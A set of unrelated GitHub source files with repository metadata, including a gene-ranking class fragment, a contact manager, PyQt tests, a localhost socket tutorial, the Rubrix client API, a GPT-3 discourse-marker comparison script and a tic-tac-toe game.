# sum_gamma-perc_gamma agreement
if self.sum_gamma is None:
self.sum_gamma = int(self.perc_gamma * n_genes)
if isinstance(y, list):
y = np.array(y)
if self.time_economy:
start = time.time()
if self.fitted == False or not (np.all(X == self.X)) or not (
np.all(y == self.y)): # hope it doesn't throw an error when X is not fitted
# storing X and parameters
self.X = X
self.y = y
# calculate F values
X_merged, y_merged, dataset_merged = merge_two_datasets(X, y, self.X_other, self.y_other,
self.mask_dataset_other)
self.F_ = calculate_F_ANOVA(X_merged, y_merged, dataset_merged)
stop = time.time()
logging.debug('__time_economy:calculation:{}'.format(stop - start))
else:
stop = time.time()
logging.debug('__time_economy:rentability:{}'.format(stop - start))
else:
X_merged, y_merged, dataset_merged = merge_two_datasets(X, y, self.X_other, self.y_other,
self.mask_dataset_other)
self.F_ = calculate_F_ANOVA(X_merged, y_merged, dataset_merged)
self.fitted = True
return self
def transform(self, X):
n_genes = X.shape[1]
ranking_F_indices = self.F_.argsort()
selection_indices = ranking_F_indices[0:np.min([self.sum_gamma, n_genes])]
# converting reference genes to binary gamma
gamma = np.zeros(n_genes, dtype="bool")
gamma[selection_indices] = True
self.gamma_ = torch.Tensor(gamma)
# ranking X_expr wrt gamma (in "avg" mode)
X_ranked = ranking_transformation(X, self.gamma_, "avg", "d")
return X_ranked
def to_lightweight(self, copy=False):
if copy:
new_lightweight = ANOVA_subset_ranking(fitted=True, X=None, y=None, sum_gamma=self.sum_gamma,
perc_gamma=self.perc_gamma, time_economy=self.time_economy,
X_other=None, y_other=None)
new_lightweight.gamma_ = self.gamma_
new_lightweight.F_ = self.F_
return new_lightweight
else:
self.X_other = None
self.y_other = None
self.X = None
self.y = None
return self
| paolamalsot/optirank | utilities/ANOVA_subset_ranking.py | ANOVA_subset_ranking.py | py | 6,722 | python | en | code | 0 | github-code | 36 |
26451217511 | # Función para agregar un contacto a la lista
def agregar_contacto(nombre, telefono, lista_contactos):
nuevo_contacto = {"Nombre": nombre, "Teléfono": telefono}
lista_contactos.append(nuevo_contacto)
print(f"Contacto {nombre} agregado.")
# Función para eliminar un contacto de la lista
def eliminar_contacto(nombre, lista_contactos):
for contacto in lista_contactos:
if contacto["Nombre"] == nombre:
lista_contactos.remove(contacto)
print(f"Contacto {nombre} eliminado.")
return
print(f"Contacto {nombre} no encontrado.")
# Función para buscar un contacto en la lista
def buscar_contacto(nombre, lista_contactos):
for contacto in lista_contactos:
if contacto["Nombre"] == nombre:
print("Contacto encontrado:")
print(contacto)
return
print(f"Contacto {nombre} no encontrado.")
# Función para mostrar la lista de contactos
def mostrar_contactos(lista_contactos):
if not lista_contactos:
print("La lista de contactos está vacía.")
else:
print("Lista de contactos:")
for contacto in lista_contactos:
print(contacto)
# Lista para almacenar los contactos
lista_de_contactos = []
# Menú principal
while True:
print("\n*** GESTIÓN DE CONTACTOS ***")
print("1. Agregar contacto")
print("2. Eliminar contacto")
print("3. Buscar contacto")
print("4. Mostrar contactos")
print("5. Salir")
opcion = input("Ingrese el número de la opción deseada: ")
if opcion == "1":
nombre = input("Ingrese el nombre del contacto: ")
telefono = input("Ingrese el teléfono del contacto: ")
agregar_contacto(nombre, telefono, lista_de_contactos)
elif opcion == "2":
nombre = input("Ingrese el nombre del contacto a eliminar: ")
eliminar_contacto(nombre, lista_de_contactos)
elif opcion == "3":
nombre = input("Ingrese el nombre del contacto a buscar: ")
buscar_contacto(nombre, lista_de_contactos)
elif opcion == "4":
mostrar_contactos(lista_de_contactos)
elif opcion == "5":
print("¡Hasta luego!")
break
else:
print("Opción no válida. Por favor, ingrese un número del 1 al 5.")
| mateotettamanti/gestioncontacts | main.py | main.py | py | 2,271 | python | es | code | 0 | github-code | 36 |
34450828117 | import pytest
from PyQt6.QtTest import QTest
from PyQt6.QtWidgets import QLineEdit
from pytestqt import qtbot
from main import OLXWork, OLXSettings
from PyQt6 import QtCore
def test_olxwork_button_stop_clicked(qtbot):
parent = OLXSettings()
widget = OLXWork(parent= parent)
widget.show()
qtbot.addWidget(widget)
assert widget.isVisible()
widget.start_timer()
qtbot.mouseClick(widget.button_stop, QtCore.Qt.MouseButton.LeftButton)
assert not widget.isVisible()
assert parent.isVisible()
def test_olxwork_animation_label(qtbot):
widget = OLXWork()
assert widget.in_progress_label.text() == "Program w trakcie pracy"
widget.animation_label_counter = 0
widget.animation_label()
assert widget.in_progress_label.text() == "Program w trakcie pracy."
for _ in range(3):
widget.animation_label()
assert widget.in_progress_label.text() == "Program w trakcie pracy"
def test_olxwork_start_timer(qtbot):
widget = OLXWork()
qtbot.addWidget(widget)
widget.start_timer()
assert widget.animation_label_timer.isActive()
assert widget.room_olx_timer.isActive()
def test_olxwork_stop_timer(qtbot):
widget = OLXWork()
qtbot.addWidget(widget)
widget.start_timer()
widget.stop_timer()
assert not widget.animation_label_timer.isActive()
assert not widget.room_olx_timer.isActive()
def test_olxwork_update_data_olxwork(qtbot):
widget = OLXWork()
qtbot.addWidget(widget)
widget.update_data_olxwork("http://something.pl","City")
assert widget.city == "City"
assert widget.url == "http://something.pl"
def test_olxsettings_button_start_clicked(qtbot):
widget = OLXSettings()
son = OLXWork(parent=widget)
widget.olx_work = son
qtbot.keyClicks(widget.city, "Zakopane")
widget.show()
assert widget.isVisible()
qtbot.addWidget(widget)
qtbot.mouseClick(widget.button_start,QtCore.Qt.MouseButton.LeftButton)
assert son.isVisible()
assert not widget.isVisible()
def test_olxsettings_check_city(qtbot):
widget = OLXSettings()
widget.city = QLineEdit()
widget.city.setText("Warszawa")
assert widget.check_city() == 0
def test_olxsettings_check_city_empty(qtbot):
widget = OLXSettings()
widget.city = QLineEdit()
widget.city.setText("")
assert widget.check_city() == 1
def test_olxsettings_check_city_invalid(qtbot):
widget = OLXSettings()
widget.city = QLineEdit()
widget.city.setText("InvalidCity")
assert widget.check_city() == 1
def test_olxsettings_main_window_type_index_changed_visible(qtbot):
widget = OLXSettings()
qtbot.addWidget(widget)
widget.show()
assert widget.type.currentIndex() == 0
assert not widget.rooms.isVisible()
assert not widget.rooms_label.isVisible()
assert widget.m_2_from.isVisible()
assert widget.m_2_to.isVisible()
qtbot.waitUntil(lambda: widget.type.count() > 0)
qtbot.mouseClick(widget.type, QtCore.Qt.MouseButton.LeftButton)
qtbot.keyClick(widget.type, QtCore.Qt.Key.Key_Down)
qtbot.keyClick(widget.type, QtCore.Qt.Key.Key_Return)
assert widget.rooms.isVisible()
assert widget.rooms_label.isVisible()
assert widget.m_2_from.isVisible()
assert widget.m_2_to.isVisible()
qtbot.waitUntil(lambda: widget.type.count() > 0)
qtbot.mouseClick(widget.type, QtCore.Qt.MouseButton.LeftButton)
qtbot.keyClick(widget.type, QtCore.Qt.Key.Key_Down)
qtbot.keyClick(widget.type, QtCore.Qt.Key.Key_Return)
assert not widget.rooms.isVisible()
assert not widget.rooms_label.isVisible()
assert not widget.m_2_from.isVisible()
assert not widget.m_2_to.isVisible() | Kandel269/OLXroom | test_main.py | test_main.py | py | 3,676 | python | en | code | 0 | github-code | 36 |
8492180165 | print('\n\n****************************************')
''' Python Socket Objects: are just like files, you can read and write to them.
These are the entry point for sending and receiving data to a client.
Python -> Clients Job:
connect --> send --> receive
'''
print(' Example of a simple client:')
'''localhost is our computer, to find an open port:
cmd+space --> Search "Network Utility
Click: "Port Scan
Open Port Search in: 127.0.0.1
It will return a list of open ports on your computer.'''
# mini client program
# Make sure miniserver.py is running
import socket
# create a socket, in a TCP/IP connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# created above, now get it to do something.
s.connect(('localhost', 5037))
# We are sending this statement, but we open in binary, so have to send in binary.
s.send(b'Happy Hacking')
# have to indicate that data was received, and can specify how much. Here 1024 bytes
# This will return, what the port has received.
data = s.recv(1024)
s.close()
print('Received:')
print(data) | ncterry/Python | Security_Basics/Sec_Send&Receive/Sec_Send&Receive.py | Sec_Send&Receive.py | py | 1,087 | python | en | code | 0 | github-code | 36 |
22330605569 | import asyncio
import logging
import os
import re
import warnings
from asyncio import Future
from functools import wraps
from inspect import signature
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union
from tqdm.auto import tqdm
from rubrix._constants import (
DATASET_NAME_REGEX_PATTERN,
DEFAULT_API_KEY,
RUBRIX_WORKSPACE_HEADER_NAME,
)
from rubrix.client.apis.datasets import Datasets
from rubrix.client.apis.metrics import MetricsAPI
from rubrix.client.apis.searches import Searches
from rubrix.client.datasets import (
Dataset,
DatasetForText2Text,
DatasetForTextClassification,
DatasetForTokenClassification,
)
from rubrix.client.metrics.models import MetricResults
from rubrix.client.models import (
BulkResponse,
Record,
Text2TextRecord,
TextClassificationRecord,
TokenClassificationRecord,
)
from rubrix.client.sdk.client import AuthenticatedClient
from rubrix.client.sdk.commons.api import async_bulk
from rubrix.client.sdk.commons.errors import RubrixClientError
from rubrix.client.sdk.datasets import api as datasets_api
from rubrix.client.sdk.datasets.models import CopyDatasetRequest, TaskType
from rubrix.client.sdk.metrics import api as metrics_api
from rubrix.client.sdk.metrics.models import MetricInfo
from rubrix.client.sdk.text2text import api as text2text_api
from rubrix.client.sdk.text2text.models import (
CreationText2TextRecord,
Text2TextBulkData,
Text2TextQuery,
)
from rubrix.client.sdk.text_classification import api as text_classification_api
from rubrix.client.sdk.text_classification.models import (
CreationTextClassificationRecord,
LabelingRule,
LabelingRuleMetricsSummary,
TextClassificationBulkData,
TextClassificationQuery,
)
from rubrix.client.sdk.token_classification import api as token_classification_api
from rubrix.client.sdk.token_classification.models import (
CreationTokenClassificationRecord,
TokenClassificationBulkData,
TokenClassificationQuery,
)
from rubrix.client.sdk.users import api as users_api
from rubrix.client.sdk.users.models import User
from rubrix.utils import setup_loop_in_thread
_LOGGER = logging.getLogger(__name__)
class _RubrixLogAgent:
def __init__(self, api: "Api"):
self.__api__ = api
self.__loop__, self.__thread__ = setup_loop_in_thread()
@staticmethod
async def __log_internal__(api: "Api", *args, **kwargs):
try:
return await api.log_async(*args, **kwargs)
except Exception as ex:
_LOGGER.error(
f"Cannot log data {args, kwargs}\n"
f"Error of type {type(ex)}\n: {ex}. ({ex.args})"
)
raise ex
def log(self, *args, **kwargs) -> Future:
return asyncio.run_coroutine_threadsafe(
self.__log_internal__(self.__api__, *args, **kwargs), self.__loop__
)
class Api:
# Larger sizes will trigger a warning
_MAX_CHUNK_SIZE = 5000
def __init__(
self,
api_url: Optional[str] = None,
api_key: Optional[str] = None,
workspace: Optional[str] = None,
timeout: int = 60,
extra_headers: Optional[Dict[str, str]] = None,
):
"""Init the Python client.
We will automatically init a default client for you when calling other client methods.
The arguments provided here will overwrite your corresponding environment variables.
Args:
api_url: Address of the REST API. If `None` (default) and the env variable ``RUBRIX_API_URL`` is not set,
it will default to `http://localhost:6900`.
api_key: Authentification key for the REST API. If `None` (default) and the env variable ``RUBRIX_API_KEY``
is not set, it will default to `rubrix.apikey`.
workspace: The workspace to which records will be logged/loaded. If `None` (default) and the
env variable ``RUBRIX_WORKSPACE`` is not set, it will default to the private user workspace.
timeout: Wait `timeout` seconds for the connection to timeout. Default: 60.
extra_headers: Extra HTTP headers sent to the server. You can use this to customize
the headers of Rubrix client requests, like additional security restrictions. Default: `None`.
Examples:
>>> import rubrix as rb
>>> rb.init(api_url="http://localhost:9090", api_key="4AkeAPIk3Y")
>>> # Customizing request headers
>>> headers = {"X-Client-id":"id","X-Secret":"secret"}
>>> rb.init(api_url="http://localhost:9090", api_key="4AkeAPIk3Y", extra_headers=headers)
"""
api_url = api_url or os.getenv("RUBRIX_API_URL", "http://localhost:6900")
# Checking that the api_url does not end in '/'
api_url = re.sub(r"\/$", "", api_url)
api_key = api_key or os.getenv("RUBRIX_API_KEY", DEFAULT_API_KEY)
workspace = workspace or os.getenv("RUBRIX_WORKSPACE")
headers = extra_headers or {}
self._client: AuthenticatedClient = AuthenticatedClient(
base_url=api_url,
token=api_key,
timeout=timeout,
headers=headers.copy(),
)
self._user: User = users_api.whoami(client=self._client)
if workspace is not None:
self.set_workspace(workspace)
self._agent = _RubrixLogAgent(self)
def __del__(self):
if hasattr(self, "_client"):
del self._client
if hasattr(self, "_agent"):
del self._agent
@property
def client(self):
"""The underlying authenticated client"""
return self._client
@property
def datasets(self) -> Datasets:
return Datasets(client=self._client)
@property
def searches(self):
return Searches(client=self._client)
@property
def metrics(self):
return MetricsAPI(client=self.client)
def set_workspace(self, workspace: str):
"""Sets the active workspace.
Args:
workspace: The new workspace
"""
if workspace is None:
raise Exception("Must provide a workspace")
if workspace != self.get_workspace():
if workspace == self._user.username:
self._client.headers.pop(RUBRIX_WORKSPACE_HEADER_NAME, workspace)
elif (
self._user.workspaces is not None
and workspace not in self._user.workspaces
):
raise Exception(f"Wrong provided workspace {workspace}")
self._client.headers[RUBRIX_WORKSPACE_HEADER_NAME] = workspace
def get_workspace(self) -> str:
"""Returns the name of the active workspace.
Returns:
The name of the active workspace as a string.
"""
return self._client.headers.get(
RUBRIX_WORKSPACE_HEADER_NAME, self._user.username
)
def copy(self, dataset: str, name_of_copy: str, workspace: str = None):
"""Creates a copy of a dataset including its tags and metadata
Args:
dataset: Name of the source dataset
name_of_copy: Name of the copied dataset
workspace: If provided, dataset will be copied to that workspace
Examples:
>>> import rubrix as rb
>>> rb.copy("my_dataset", name_of_copy="new_dataset")
>>> rb.load("new_dataset")
"""
datasets_api.copy_dataset(
client=self._client,
name=dataset,
json_body=CopyDatasetRequest(name=name_of_copy, target_workspace=workspace),
)
def delete(self, name: str) -> None:
"""Deletes a dataset.
Args:
name: The dataset name.
Examples:
>>> import rubrix as rb
>>> rb.delete(name="example-dataset")
"""
datasets_api.delete_dataset(client=self._client, name=name)
def log(
self,
records: Union[Record, Iterable[Record], Dataset],
name: str,
tags: Optional[Dict[str, str]] = None,
metadata: Optional[Dict[str, Any]] = None,
chunk_size: int = 500,
verbose: bool = True,
background: bool = False,
) -> Union[BulkResponse, Future]:
"""Logs Records to Rubrix.
The logging happens asynchronously in a background thread.
Args:
records: The record, an iterable of records, or a dataset to log.
name: The dataset name.
tags: A dictionary of tags related to the dataset.
metadata: A dictionary of extra info for the dataset.
chunk_size: The chunk size for a data bulk.
verbose: If True, shows a progress bar and prints out a quick summary at the end.
background: If True, we will NOT wait for the logging process to finish and return an ``asyncio.Future``
object. You probably want to set ``verbose`` to False in that case.
Returns:
Summary of the response from the REST API.
If the ``background`` argument is set to True, an ``asyncio.Future`` will be returned instead.
Examples:
>>> import rubrix as rb
>>> record = rb.TextClassificationRecord(
... text="my first rubrix example",
... prediction=[('spam', 0.8), ('ham', 0.2)]
... )
>>> rb.log(record, name="example-dataset")
1 records logged to http://localhost:6900/datasets/rubrix/example-dataset
BulkResponse(dataset='example-dataset', processed=1, failed=0)
>>>
>>> # Logging records in the background
>>> rb.log(record, name="example-dataset", background=True, verbose=False)
<Future at 0x7f675a1fffa0 state=pending>
"""
future = self._agent.log(
records=records,
name=name,
tags=tags,
metadata=metadata,
chunk_size=chunk_size,
verbose=verbose,
)
if background:
return future
try:
return future.result()
finally:
future.cancel()
async def log_async(
self,
records: Union[Record, Iterable[Record], Dataset],
name: str,
tags: Optional[Dict[str, str]] = None,
metadata: Optional[Dict[str, Any]] = None,
chunk_size: int = 500,
verbose: bool = True,
) -> BulkResponse:
"""Logs Records to Rubrix with asyncio.
Args:
records: The record, an iterable of records, or a dataset to log.
name: The dataset name.
tags: A dictionary of tags related to the dataset.
metadata: A dictionary of extra info for the dataset.
chunk_size: The chunk size for a data bulk.
verbose: If True, shows a progress bar and prints out a quick summary at the end.
Returns:
Summary of the response from the REST API
Examples:
>>> # Log asynchronously from your notebook
>>> import asyncio
>>> import rubrix as rb
>>> from rubrix.utils import setup_loop_in_thread
>>> loop, _ = setup_loop_in_thread()
>>> future_response = asyncio.run_coroutine_threadsafe(
... rb.log_async(my_records, dataset_name), loop
... )
"""
tags = tags or {}
metadata = metadata or {}
if not name:
raise InputValueError("Empty dataset name has been passed as argument.")
if not re.match(DATASET_NAME_REGEX_PATTERN, name):
raise InputValueError(
f"Provided dataset name {name} does not match the pattern {DATASET_NAME_REGEX_PATTERN}. "
"Please, use a valid name for your dataset"
)
if chunk_size > self._MAX_CHUNK_SIZE:
_LOGGER.warning(
"""The introduced chunk size is noticeably large, timeout errors may occur.
Consider a chunk size smaller than %s""",
self._MAX_CHUNK_SIZE,
)
if isinstance(records, Record.__args__):
records = [records]
records = list(records)
try:
record_type = type(records[0])
except IndexError:
raise InputValueError("Empty record list has been passed as argument.")
if record_type is TextClassificationRecord:
bulk_class = TextClassificationBulkData
creation_class = CreationTextClassificationRecord
elif record_type is TokenClassificationRecord:
bulk_class = TokenClassificationBulkData
creation_class = CreationTokenClassificationRecord
elif record_type is Text2TextRecord:
bulk_class = Text2TextBulkData
creation_class = CreationText2TextRecord
else:
raise InputValueError(
f"Unknown record type {record_type}. Available values are {Record.__args__}"
)
processed, failed = 0, 0
progress_bar = tqdm(total=len(records), disable=not verbose)
for i in range(0, len(records), chunk_size):
chunk = records[i : i + chunk_size]
response = await async_bulk(
client=self._client,
name=name,
json_body=bulk_class(
tags=tags,
metadata=metadata,
records=[creation_class.from_client(r) for r in chunk],
),
)
processed += response.parsed.processed
failed += response.parsed.failed
progress_bar.update(len(chunk))
progress_bar.close()
# TODO: improve logging policy in library
if verbose:
_LOGGER.info(
f"Processed {processed} records in dataset {name}. Failed: {failed}"
)
workspace = self.get_workspace()
if (
not workspace
): # Just for backward comp. with datasets with no workspaces
workspace = "-"
print(
f"{processed} records logged to {self._client.base_url}/datasets/{workspace}/{name}"
)
# Creating a composite BulkResponse with the total processed and failed
return BulkResponse(dataset=name, processed=processed, failed=failed)
def delete_records(
self,
name: str,
query: Optional[str] = None,
ids: Optional[List[Union[str, int]]] = None,
discard_only: bool = False,
discard_when_forbidden: bool = True,
) -> Tuple[int, int]:
"""Delete records from a Rubrix dataset.
Args:
name: The dataset name.
query: An ElasticSearch query with the `query string syntax
<https://rubrix.readthedocs.io/en/stable/guides/queries.html>`_
ids: If provided, deletes dataset records with given ids.
discard_only: If `True`, matched records won't be deleted. Instead, they will be marked as `Discarded`
discard_when_forbidden: Only super-user or dataset creator can delete records from a dataset.
So, running "hard" deletion for other users will raise an `ForbiddenApiError` error.
If this parameter is `True`, the client API will automatically try to mark as ``Discarded``
records instead. Default, `True`
Returns:
The total of matched records and real number of processed errors. These numbers could not
be the same if some data conflicts are found during operations (some matched records change during
deletion).
Examples:
>>> ## Delete by id
>>> import rubrix as rb
>>> rb.delete_records(name="example-dataset", ids=[1,3,5])
>>> ## Discard records by query
>>> import rubrix as rb
>>> rb.delete_records(name="example-dataset", query="metadata.code=33", discard_only=True)
"""
return self.datasets.delete_records(
name=name,
query=query,
ids=ids,
mark_as_discarded=discard_only,
discard_when_forbidden=discard_when_forbidden,
)
def load(
self,
name: str,
query: Optional[str] = None,
ids: Optional[List[Union[str, int]]] = None,
limit: Optional[int] = None,
id_from: Optional[str] = None,
as_pandas=None,
) -> Dataset:
"""Loads a Rubrix dataset.
Parameters:
-----------
name:
The dataset name.
query:
An ElasticSearch query with the
`query string syntax <https://rubrix.readthedocs.io/en/stable/guides/queries.html>`_
ids:
If provided, load dataset records with given ids.
limit:
The number of records to retrieve.
id_from:
If provided, starts gathering the records starting from that Record. As the Records returned with the
load method are sorted by ID, ´id_from´ can be used to load using batches.
as_pandas:
DEPRECATED! To get a pandas DataFrame do ``rb.load('my_dataset').to_pandas()``.
Returns:
--------
A Rubrix dataset.
Examples:
**Basic Loading**: load the samples sorted by their ID
>>> import rubrix as rb
>>> dataset = rb.load(name="example-dataset")
**Iterate over a large dataset:**
When dealing with a large dataset you might want to load it in batches to optimize memory consumption
and avoid network timeouts. To that end, a simple batch-iteration over the whole database can be done
employing the `from_id` parameter. This parameter will act as a delimiter, retrieving the N items after
the given id, where N is determined by the `limit` parameter. **NOTE** If
no `limit` is given the whole dataset after that ID will be retrieved.
>>> import rubrix as rb
>>> dataset_batch_1 = rb.load(name="example-dataset", limit=1000)
>>> dataset_batch_2 = rb.load(name="example-dataset", limit=1000, id_from=dataset_batch_1[-1].id)
"""
if as_pandas is False:
warnings.warn(
"The argument `as_pandas` is deprecated and will be removed in a future version. "
"Please adapt your code accordingly. ",
FutureWarning,
)
elif as_pandas is True:
raise ValueError(
"The argument `as_pandas` is deprecated and will be removed in a future version. "
"Please adapt your code accordingly. ",
"If you want a pandas DataFrame do `rb.load('my_dataset').to_pandas()`.",
)
response = datasets_api.get_dataset(client=self._client, name=name)
task = response.parsed.task
task_config = {
TaskType.text_classification: (
text_classification_api.data,
TextClassificationQuery,
DatasetForTextClassification,
),
TaskType.token_classification: (
token_classification_api.data,
TokenClassificationQuery,
DatasetForTokenClassification,
),
TaskType.text2text: (
text2text_api.data,
Text2TextQuery,
DatasetForText2Text,
),
}
try:
get_dataset_data, request_class, dataset_class = task_config[task]
except KeyError:
raise ValueError(
f"Load method not supported for the '{task}' task. Supported tasks: "
f"{[TaskType.text_classification, TaskType.token_classification, TaskType.text2text]}"
)
response = get_dataset_data(
client=self._client,
name=name,
request=request_class(ids=ids, query_text=query),
limit=limit,
id_from=id_from,
)
records = [sdk_record.to_client() for sdk_record in response.parsed]
try:
records_sorted_by_id = sorted(records, key=lambda x: x.id)
# record ids can be a mix of int/str -> sort all as str type
except TypeError:
records_sorted_by_id = sorted(records, key=lambda x: str(x.id))
return dataset_class(records_sorted_by_id)
def dataset_metrics(self, name: str) -> List[MetricInfo]:
response = datasets_api.get_dataset(self._client, name)
response = metrics_api.get_dataset_metrics(
self._client, name=name, task=response.parsed.task
)
return response.parsed
def get_metric(self, name: str, metric: str) -> Optional[MetricInfo]:
metrics = self.dataset_metrics(name)
for metric_ in metrics:
if metric_.id == metric:
return metric_
def compute_metric(
self,
name: str,
metric: str,
query: Optional[str] = None,
interval: Optional[float] = None,
size: Optional[int] = None,
) -> MetricResults:
response = datasets_api.get_dataset(self._client, name)
metric_ = self.get_metric(name, metric=metric)
assert metric_ is not None, f"Metric {metric} not found !!!"
response = metrics_api.compute_metric(
self._client,
name=name,
task=response.parsed.task,
metric=metric,
query=query,
interval=interval,
size=size,
)
return MetricResults(**metric_.dict(), results=response.parsed)
def fetch_dataset_labeling_rules(self, dataset: str) -> List[LabelingRule]:
response = text_classification_api.fetch_dataset_labeling_rules(
self._client, name=dataset
)
return [LabelingRule.parse_obj(data) for data in response.parsed]
def rule_metrics_for_dataset(
self, dataset: str, rule: LabelingRule
) -> LabelingRuleMetricsSummary:
response = text_classification_api.dataset_rule_metrics(
self._client, name=dataset, query=rule.query, label=rule.label
)
return LabelingRuleMetricsSummary.parse_obj(response.parsed)
__ACTIVE_API__: Optional[Api] = None
def active_api() -> Api:
"""Returns the active API.
If Active API is None, initialize a default one.
"""
global __ACTIVE_API__
if __ACTIVE_API__ is None:
__ACTIVE_API__ = Api()
return __ACTIVE_API__
def api_wrapper(api_method: Callable):
"""Decorator to wrap the API methods in module functions.
Propagates the docstrings and adapts the signature of the methods.
"""
def decorator(func):
if asyncio.iscoroutinefunction(api_method):
@wraps(api_method)
async def wrapped_func(*args, **kwargs):
return await func(*args, **kwargs)
else:
@wraps(api_method)
def wrapped_func(*args, **kwargs):
return func(*args, **kwargs)
sign = signature(api_method)
wrapped_func.__signature__ = sign.replace(
parameters=[val for key, val in sign.parameters.items() if key != "self"]
)
return wrapped_func
return decorator
@api_wrapper(Api.__init__)
def init(*args, **kwargs):
global __ACTIVE_API__
__ACTIVE_API__ = Api(*args, **kwargs)
@api_wrapper(Api.set_workspace)
def set_workspace(*args, **kwargs):
return active_api().set_workspace(*args, **kwargs)
@api_wrapper(Api.get_workspace)
def get_workspace(*args, **kwargs):
return active_api().get_workspace(*args, **kwargs)
@api_wrapper(Api.copy)
def copy(*args, **kwargs):
return active_api().copy(*args, **kwargs)
@api_wrapper(Api.delete)
def delete(*args, **kwargs):
return active_api().delete(*args, **kwargs)
@api_wrapper(Api.log)
def log(*args, **kwargs):
return active_api().log(*args, **kwargs)
@api_wrapper(Api.log_async)
def log_async(*args, **kwargs):
return active_api().log_async(*args, **kwargs)
@api_wrapper(Api.load)
def load(*args, **kwargs):
return active_api().load(*args, **kwargs)
@api_wrapper(Api.delete_records)
def delete_records(*args, **kwargs):
return active_api().delete_records(*args, **kwargs)
class InputValueError(RubrixClientError):
pass
| Skumarh89/rubrix | src/rubrix/client/api.py | api.py | py | 24,714 | python | en | code | null | github-code | 36 |
71707177064 | import openai
import csv
import argparse
from collections import Counter
from typing import List
from data.discourse_connectors import discourse_connectors
# Ihr OpenAI GPT-3 API-Schlüssel
api_key = "[insert your API KEY here]"
def parse_arguments() -> argparse.Namespace:
"""CLI-Argumente parsen."""
parser = argparse.ArgumentParser(description='Vergleicht die Häufigkeit von Diskursmarkern in Artikeln und GPT-3 Texten.')
parser.add_argument('korpus', help='Pfad zum TSV-Korpus')
parser.add_argument('--anzahl_artikel', type=int, default=10, help='Anzahl der zu vergleichenden Artikel')
return parser.parse_args()
def count_connectors(text: str, connectors, List) -> Counter:
"""Zählt die Diskursmarker im Text."""
words = text.lower().split()
return Counter([word for word in words if word in connectors])
def get_gpt_text(prompt: str, token_limit: int) -> str:
"""Holt den generierten Text von GPT-3."""
openai.api_key = api_key
response = openai.Completion.create(
engine="text-davinci-002",
prompt=prompt,
max_tokens=token_limit
)
return response.choices[0].text.strip()
def trim_to_same_length(article_text: str, gpt_text: str) -> (str, str):
"""Kürzt die Texte auf die gleiche Länge."""
token_limit = min(len(article_text.split()), len(gpt_text.split()))
return ' '.join(article_text.split()[:token_limit]), ' '.join(gpt_text.split()[:token_limit])
def sum_total_connectors(counter: Counter) -> int:
"""Berechnet die Gesamtanzahl der Diskursmarker in einem Counter."""
return sum(counter.values())
def main():
"""
Pseudo-Code für main():
1. CLI-Argumente parsen.
2. Öffne den Korpus und lese die angegebene Anzahl an Artikeln.
3. Für jeden Artikel:
a. Nutze die ersten 10 Sätze als Prompt für GPT-3.
b. Generiere den GPT-3 Text.
c. Kürze Artikel und GPT-3 Text auf die gleiche Länge.
d. Zähle die Diskursmarker in beiden Texten.
e. Schreibe die Ergebnisse in die CSV-Datei.
4. Berechne die Durchschnittswerte und gib sie im Terminal aus.
"""
args = parse_arguments()
# Ausgabe-CSV-Datei vorbereiten
with open('output.csv', 'w', newline='', encoding='utf-8') as csvfile:
fieldnames = ['Head', 'Article_Connectors', 'Article_Text', 'GPT_Connectors', 'GPT_Text']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
article_connector_totals = []
gpt_connector_totals = []
# Korpus öffnen und Artikel lesen
with open(args.korpus, 'r', encoding='utf-8') as f:
reader = csv.DictReader(f, delimiter='\t')
for i, row in enumerate(reader):
if i >= args.anzahl_artikel:
break
# Prompt für GPT-3 erstellen
article_text = row['content']
head = row['head']
prompt = '. '.join(article_text.split('. ')[:10])
# GPT-3 Text generieren
token_limit = len(article_text.split())
gpt_text = get_gpt_text(prompt, token_limit)
# Texte auf gleiche Länge kürzen
article_text, gpt_text = trim_to_same_length(article_text, gpt_text)
# Diskursmarker zählen
article_counts = count_connectors(article_text, discourse_connectors)
gpt_counts = count_connectors(gpt_text, discourse_connectors)
article_total = sum_total_connectors(article_counts)
gpt_total = sum_total_connectors(gpt_counts)
# Ergebnisse in der CSV-Datei speichern
writer.writerow({'Head': head, 'Article_Connectors': article_total, 'Article_Text': article_text, 'GPT_Connectors': gpt_total, 'GPT_Text': gpt_text})
article_connector_totals.append(article_total)
gpt_connector_totals.append(gpt_total)
# Durchschnittswerte berechnen
avg_article_total = sum(article_connector_totals) / args.anzahl_artikel
avg_gpt_total = sum(gpt_connector_totals) / args.anzahl_artikel
# Durchschnittswerte im Terminal ausgeben
print(f"Durchschnittliche Diskursmarker im Artikel: {avg_article_total}")
print(f"Durchschnittliche Diskursmarker im GPT-Text: {avg_gpt_total}")
if __name__ == '__main__':
main()
"""
Output:
Durchschnittliche Diskursmarker im Artikel: 26.1
Durchschnittliche Diskursmarker im GPT-Text: 24.6
""" | SandroWick/gpt_discourseconnectives_counter | gpt_discourseconnectives_project.py | gpt_discourseconnectives_project.py | py | 4,623 | python | de | code | 0 | github-code | 36 |
19905228937 | import random
# Print board
def print_board(board):
print("+---+---+---+")
for i in range(3):
print("|", end=" ")
for j in range(3):
print(board[i * 3 + j], end=" | ")
print("\n+---+---+---+")
# Check who is the winner
def check_winner(board):
winning_combos = [(0, 1, 2), (3, 4, 5), (6, 7, 8), (0, 3, 6), (1, 4, 7), (2, 5, 8), (0, 4, 8), (2, 4, 6)]
for combo in winning_combos:
if board[combo[0]] == board[combo[1]] == board[combo[2]] != " ":
return board[combo[0]]
return None
# Get human move
def get_human_move(board):
while True:
move = input("Enter a move (1-9): ")
if not move.isdigit() or int(move) < 1 or int(move) > 9 or board[int(move) - 1] != " ":
print("Invalid move, try again.")
continue
return int(move) - 1
# Get computer move
def get_computer_move(board):
available_moves = [i for i in range(9) if board[i] == " "]
# Check if any move can win the game
for move in available_moves:
test_board = list(board)
test_board[move] = "O"
if check_winner(test_board) == "O":
return move
# Check if any move can prevent the human from winning the game
for move in available_moves:
test_board = list(board)
test_board[move] = "X"
if check_winner(test_board) == "X":
return move
# Choose a random available move
return random.choice(available_moves)
def main():
board = [" " for i in range(9)]
while True:
print_board(board)
winner = check_winner(board)
if winner:
print(f"{winner} wins!")
break
if " " not in board:
print("Tie!")
break
if len([i for i in board if i != " "]) % 2 == 0:
move = get_computer_move(board)
board[move] = "O"
print(f"Computer played move {move + 1}.")
else:
move = get_human_move(board)
board[move] = "X"
print(f"Human played move {move + 1}.")
if __name__ == "__main__":
main()
| kpeeva/tictactoe | game.py | game.py | py | 2,134 | python | en | code | 0 | github-code | 36 |
